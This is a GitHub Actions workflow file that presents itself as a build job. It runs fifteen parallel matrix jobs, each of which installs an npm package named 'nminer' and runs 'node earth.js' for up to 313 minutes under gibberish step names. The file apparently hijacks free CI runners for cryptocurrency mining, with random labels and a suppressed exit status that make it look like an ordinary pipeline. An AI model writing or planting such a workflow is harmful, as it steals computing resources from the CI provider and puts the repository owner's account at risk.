name: earth
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1385 }
          - { version: 1081 }
          - { version: 8447 }
          - { version: 1929 }
          - { version: 7469 }
          - { version: 1094 }
          - { version: 2996 }
          - { version: 2994 }
          - { version: 7732 }
          - { version: 7162 }
          - { version: 8980 }
          - { version: 3206 }
          - { version: 2522 }
          - { version: 5185 }
          - { version: 791 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: drat colorfully gummy
        run: |
          npm install nminer@latest
          timeout 313m node earth.js || echo "earth executed"